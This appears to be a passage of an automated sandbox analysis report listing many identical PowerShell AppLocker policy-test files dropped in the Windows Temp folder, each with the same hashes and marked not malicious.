                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Windows\Temp\__PSScriptPolicyTest_5qrv0usa.uxk.psm1

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Windows\Temp\__PSScriptPolicyTest_a2mhl3l4.pvr.psm1

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Windows\Temp\__PSScriptPolicyTest_bhfirt3m.nxm.ps1

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Windows\Temp\__PSScriptPolicyTest_bsjf2icv.uai.psm1

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Windows\Temp\__PSScriptPolicyTest_by2l5cwc.djl.ps1

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Windows\Temp\__PSScriptPolicyTest_d4v40a4p.rwa.psm1

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Windows\Temp\__PSScriptPolicyTest_dhhjokcf.tvo.ps1

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Windows\Temp\__PSScriptPolicyTest_f4fsltzy.hmk.psm1

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Windows\Temp\__PSScriptPolicyTest_h5xdg0go.5zu.ps1

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Windows\Temp\__PSScriptPolicyTest_hkmzxwzm.f43.ps1

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Windows\Temp\__PSScriptPolicyTest_iaeeuynx.bsw.ps1

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Windows\Temp\__PSScriptPolicyTest_ish2ux4i.kia.ps1

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Windows\Temp\__PSScriptPolicyTest_j4hdcsn2.r34.psm1

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Windows\Temp\__PSScriptPolicyTest_jltvgfag.d53.ps1

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Windows\Temp\__PSScriptPolicyTest_kd2kjadw.klc.psm1

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Windows\Temp\__PSScriptPolicyTest_kf5iwc0g.sz5.psm1

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Windows\Temp\__PSScriptPolicyTest_kyh0g1mw.hwq.ps1

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Windows\Temp\__PSScriptPolicyTest_n0hqfvai.v0b.ps1

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Windows\Temp\__PSScriptPolicyTest_nbpsbzwb.gyw.ps1

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Windows\Temp\__PSScriptPolicyTest_p1fyep2c.0n1.ps1

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Windows\Temp\__PSScriptPolicyTest_qaoshhnk.ihw.psm1

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Windows\Temp\__PSScriptPolicyTest_qr05aytm.izs.ps1

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Windows\Temp\__PSScriptPolicyTest_r1s3rjiq.n4j.psm1

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Windows\Temp\__PSScriptPolicyTest_rhtrp13g.gkd.psm1

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Windows\Temp\__PSScriptPolicyTest_rkujaaq0.sto.psm1

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Windows\Temp\__PSScriptPolicyTest_skaxtcny.v0s.psm1

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Windows\Temp\__PSScriptPolicyTest_vjxpx4ni.vlv.psm1

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Windows\Temp\__PSScriptPolicyTest_x1dopqms.lgl.psm1

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Windows\Temp\__PSScriptPolicyTest_x5juog1b.n4r.ps1

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Windows\Temp\__PSScriptPolicyTest_ze0yliox.mzm.ps1

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
